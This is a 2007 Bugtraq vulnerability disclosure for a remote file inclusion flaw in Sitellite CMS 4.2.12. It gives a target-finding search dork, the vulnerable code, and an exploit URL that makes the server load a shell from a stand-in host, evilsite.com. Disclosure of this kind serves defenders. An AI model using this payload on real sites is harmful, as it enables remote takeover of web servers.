Message-ID: <20070616162416.8770.qmail@securityfocus.com>
Date: 16 Jun 2007 16:24:16 -0000
From: CarcaBot@...caBot.ro
To: bugtraq@...urityfocus.com
Subject: Sitellite cms <= 4.2.12 RFI Vuln
############################################################
# Link: http://www.sitelliteforge.com/index/siteforge-download-action/proj.sitellite?dl=sitellite-4.2.12-stable.tar.gz
# version 4.2.12
# Dork : "Powered by Sitellite"
# FOUND BY : CarcaBot
# CarcaBot@...caBot.ro
# Website: http://www.sitellite.org/
# DOWNLOAD : http://www.sitelliteforge.com/index/siteforge-app/proj.sitellite
# REMOTE FILE INCLUDE
############################################################
# FILE :
# PATH\saf\lib\PEAR\PhpDocumentor\Documentation\tests\bug-559668.php
############################################################
# EXP:
# site.com\path\saf\lib\PEAR\PhpDocumentor\Documentation\tests\559668.php?FORUM[LIB]=http://evilsite.com/yourshell.txt?
############################################################
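# CODE: on line 4
# ($FORUM['LIB'] is never assigned in this file, so its value can come from
# the request only when register_globals is on; a remote URL is accepted only
# with allow_url_fopen and, on PHP 5.2+, allow_url_include enabled)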
# <?php
# /** @package tests */
# /** include tests */
# require_once $FORUM['LIB'] . '/classes/db/PearDb.php';
# require PEAR . 'test' . 'me';
# include('file.ext');
# include 'file.ext';
# include(PEAR . 'test' . 'me');
# ?>
############################################################
# http://Hacking.CarcaBot.ro - Romanian Electronic Network Security Lab Team !
# CarcaBot@...caBot.ro - Support@...caBot.ro
# Thanks to RENSLT Crew
############################################################
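#
# Note: the PhpDocumentor directory is .htaccess'ed, i.e. access to it is
# restricted by an .htaccess file, so the script should only be reachable over
# the web where that file is missing or not honoured by the server.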